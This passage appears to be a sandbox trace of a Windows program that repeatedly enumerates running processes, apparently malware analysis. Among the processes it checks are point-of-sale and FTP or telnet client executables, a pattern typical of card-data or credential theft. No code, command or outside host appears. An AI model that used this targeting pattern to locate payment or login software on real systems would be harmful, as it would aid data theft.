szExeFile="edcsvr.exe")) returned 1 [0182.379] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0182.380] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0182.418] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0182.420] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0182.422] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0182.424] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0182.425] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0182.427] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0182.429] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0182.431] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0182.432] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0182.434] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0182.436] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0182.438] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0182.439] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0182.441] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0182.442] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0182.444] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0182.446] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0182.448] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0182.449] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0182.451] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0182.452] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0182.494] CloseHandle (hObject=0x17ec) returned 1 [0182.494] Sleep (dwMilliseconds=0x64) [0182.509] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0182.546] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.549] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0182.550] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0182.552] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.553] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0182.555] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.556] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0182.558] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0182.559] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0182.561] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.562] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.569] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0182.570] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.586] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.595] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.600] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.617] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.618] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.620] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.622] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0182.624] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0182.627] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.629] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0182.631] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.632] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0182.634] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0182.635] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0182.647] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0182.650] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0182.651] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0182.652] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.654] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0182.655] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0182.656] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0182.658] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0182.784] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.785] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0182.787] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0182.789] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0182.790] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0182.793] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0182.794] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0182.796] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0182.798] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0182.799] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0182.800] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0182.802] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0182.803] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0182.805] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0182.806] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0182.808] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0182.809] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0182.811] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0182.812] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0182.814] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0182.815] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0182.816] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0182.818] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0182.861] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, 